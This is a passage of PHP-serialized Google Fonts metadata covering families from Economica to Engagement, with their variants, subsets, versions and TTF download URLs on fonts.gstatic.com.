:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/economica/v13/Qw3fZQZaHCLgIWa29ZBrMcgAAl1lfQ.ttf\";s:6:\"italic\";s:77:\"http://fonts.gstatic.com/s/economica/v13/Qw3ZZQZaHCLgIWa29ZBbM8IEIFh1fWUl.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/economica/v13/Qw3aZQZaHCLgIWa29ZBTjeckCnZ5dHw8iw.ttf\";s:9:\"700italic\";s:81:\"http://fonts.gstatic.com/s/economica/v13/Qw3EZQZaHCLgIWa29ZBbM_q4D3x9Vnksi4M7.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:349;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Eczar\";s:8:\"variants\";a:5:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:5:{i:0;s:10:\"devanagari\";i:1;s:5:\"greek\";i:2;s:9:\"greek-ext\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":5:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXHd6WqTIVKWJKWg.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXL96WqTIVKWJKWg.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXw9mWqTIVKWJKWg.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDX-tmWqTIVKWJKWg.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/eczar/v17/BXR2vF3Pi-DLmxcpJB-qbNTyTMDXndmWqTIVKWJKWg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:350;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Edu NSW ACT Foundation\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:118:\"http://fonts.gstatic.com/s/edunswactfoundation/v1/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki9tovGLeC-sfguJ.ttf\";s:3:\"500\";s:118:\"http://fonts.gstatic.com/s/edunswactfoundation/v1/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki9fovGLeC-sfguJ.ttf\";s:3:\"600\";s:118:\"http://fonts.gstatic.com/s/edunswactfoundation/v1/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki-zpfGLeC-sfguJ.ttf\";s:3:\"700\";s:118:\"http://fonts.gstatic.com/s/edunswactfoundation/v1/raxRHjqJtsNBFUi8WO0vUBgc9D-2lV_oQdCAYlt_QTQ0vUxJki-KpfGLeC-sfguJ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:351;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Edu QLD Beginner\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/eduqldbeginner/v1/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE4E3oebi6vyVWCN.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/eduqldbeginner/v1/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE423oebi6vyVWCN.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/eduqldbeginner/v1/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE7a2Yebi6vyVWCN.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/eduqldbeginner/v1/AMOHz5iUuHLEMNXyohhc_Y56PR3A8dNLF_w3Ka4HKE7j2Yebi6vyVWCN.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:352;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Edu SA Beginner\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/edusabeginner/v1/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9989fo1yBydUEDs.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/edusabeginner/v1/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9-09fo1yBydUEDs.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/edusabeginner/v1/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9wE6fo1yBydUEDs.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/edusabeginner/v1/rnC_-xRb1x-1lHXnLaZZ2xOoLIGfU3L82irpr_3C9zg6fo1yBydUEDs.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:353;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Edu TAS Beginner\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/edutasbeginner/v1/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_HwemkrBWRhvk02.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/edutasbeginner/v1/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_HCemkrBWRhvk02.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/edutasbeginner/v1/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_EufWkrBWRhvk02.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/edutasbeginner/v1/ZXuwe04WubHfGVY-1TcNg7AFUmshg8jIUTzK3r34f_EXfWkrBWRhvk02.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:354;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Edu VIC WA NT Beginner\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-07-06\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:117:\"http://fonts.gstatic.com/s/eduvicwantbeginner/v1/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-OXlPmFXwnpkeGR.ttf\";s:3:\"500\";s:117:\"http://fonts.gstatic.com/s/eduvicwantbeginner/v1/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-OllPmFXwnpkeGR.ttf\";s:3:\"600\";s:117:\"http://fonts.gstatic.com/s/eduvicwantbeginner/v1/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-NJk_mFXwnpkeGR.ttf\";s:3:\"700\";s:117:\"http://fonts.gstatic.com/s/eduvicwantbeginner/v1/jiz2RF1BuW9OwcnNPxLl4KfZCHd9nFtd5Tu7stCpElYpvPfZZ-Nwk_mFXwnpkeGR.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:355;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"El Messiri\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:8:\"cyrillic\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/elmessiri/v16/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuXwe65ghj3OoapG.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/elmessiri/v16/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuXCe65ghj3OoapG.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/elmessiri/v16/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuUufK5ghj3OoapG.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/elmessiri/v16/K2FhfZBRmr9vQ1pHEey6GIGo8_pv3myYjuUXfK5ghj3OoapG.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:356;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Electrolize\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/electrolize/v14/cIf5Ma1dtE0zSiGSiED7AUEGso5tQafB.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:357;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Elsie\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/elsie/v12/BCanqZABrez54yYu9slAeLgX.ttf\";s:3:\"900\";s:69:\"http://fonts.gstatic.com/s/elsie/v12/BCaqqZABrez54x6q2-1IU6QeXSBk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:358;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Elsie Swash Caps\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/elsieswashcaps/v21/845DNN8xGZyVX5MVo_upKf7KnjK0ferVKGWsUo8.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/elsieswashcaps/v21/845ENN8xGZyVX5MVo_upKf7KnjK0RW74DG2HToawrdU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:359;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Emblema One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/emblemaone/v21/nKKT-GQ0F5dSY8vzG0rOEIRBHl57G_f_.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:360;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Emilys Candy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/emilyscandy/v13/2EbgL-1mD1Rnb0OGKudbk0y5r9xrX84JjA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:361;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Encode Sans\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHiZtWP7FJCt2c.ttf\";s:3:\"200\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHjZtWP7FJCt2c.ttf\";s:3:\"300\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGD_jZtWP7FJCt2c.ttf\";s:7:\"regular\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHjZtWP7FJCt2c.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGFPjZtWP7FJCt2c.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGL_kZtWP7FJCt2c.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGIbkZtWP7FJCt2c.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHkZtWP7FJCt2c.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/encodesans/v15/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGMjkZtWP7FJCt2c.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:362;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Encode Sans Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_76_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-5a-JLQoFI2KR.ttf\";s:3:\"200\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-SY6pByQJKnuIFA.ttf\";s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-LY2pByQJKnuIFA.ttf\";s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_16_LD37rqfuwxyIuaZhE6cRXOLtm2gfTGgaWNDw8VIw.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-dYypByQJKnuIFA.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-WYupByQJKnuIFA.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-PYqpByQJKnuIFA.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-IYmpByQJKnuIFA.ttf\";s:3:\"900\";s:105:\"http://fonts.gstatic.com/s/encodesanscondensed/v10/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-BYipByQJKnuIFA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:363;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Encode Sans Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:101:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mx1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpJGKQNicoAbJlw.ttf\";s:3:\"200\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLqCCNIXIwSP0XD.ttf\";s:3:\"300\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKOCyNIXIwSP0XD.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4m_1mF4GcnstG_Jh1QH6ac4hNLeNyeYUqoiIwdAd5Ab.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLWCiNIXIwSP0XD.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpL6DSNIXIwSP0XD.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKeDCNIXIwSP0XD.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKCDyNIXIwSP0XD.ttf\";s:3:\"900\";s:102:\"http://fonts.gstatic.com/s/encodesansexpanded/v10/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKmDiNIXIwSP0XD.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:364;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Encode Sans SC\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HHhn8c9NOEEClIc.ttf\";s:3:\"200\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HPhm8c9NOEEClIc.ttf\";s:3:\"300\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HCZm8c9NOEEClIc.ttf\";s:7:\"regular\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HHhm8c9NOEEClIc.ttf\";s:3:\"500\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HEpm8c9NOEEClIc.ttf\";s:3:\"600\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HKZh8c9NOEEClIc.ttf\";s:3:\"700\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HJ9h8c9NOEEClIc.ttf\";s:3:\"800\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HPhh8c9NOEEClIc.ttf\";s:3:\"900\";s:118:\"http://fonts.gstatic.com/s/encodesanssc/v8/jVyp7nLwCGzQ9zE7ZyRg0QRXHPZc_uUA6Kb3VJWLE_Pdtm7lcD6qvXT1HNFh8c9NOEEClIc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:365;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Encode Sans Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:114:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT6oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1T19MFtQ9jpVUA.ttf\";s:3:\"200\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RZ1eFHbdTgTFmr.ttf\";s:3:\"300\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Q91uFHbdTgTFmr.ttf\";s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT4oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG2yR_sVPRsjp.ttf\";s:3:\"500\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Rl1-FHbdTgTFmr.ttf\";s:3:\"600\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RJ0OFHbdTgTFmr.ttf\";s:3:\"700\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qt0eFHbdTgTFmr.ttf\";s:3:\"800\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qx0uFHbdTgTFmr.ttf\";s:3:\"900\";s:115:\"http://fonts.gstatic.com/s/encodesanssemicondensed/v10/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1QV0-FHbdTgTFmr.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:366;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Encode Sans Semi Expanded\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:112:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8xOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM-41KwrlKXeOEA.ttf\";s:3:\"200\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM0IUCyDLJX6XCWU.ttf\";s:3:\"300\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyYXCyDLJX6XCWU.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke83OhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TC4o_LyjgOXc.ttf\";s:3:\"500\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM34WCyDLJX6XCWU.ttf\";s:3:\"600\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM1IRCyDLJX6XCWU.ttf\";s:3:\"700\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMzYQCyDLJX6XCWU.ttf\";s:3:\"800\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyoTCyDLJX6XCWU.ttf\";s:3:\"900\";s:113:\"http://fonts.gstatic.com/s/encodesanssemiexpanded/v18/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMw4SCyDLJX6XCWU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:367;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Engagement\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-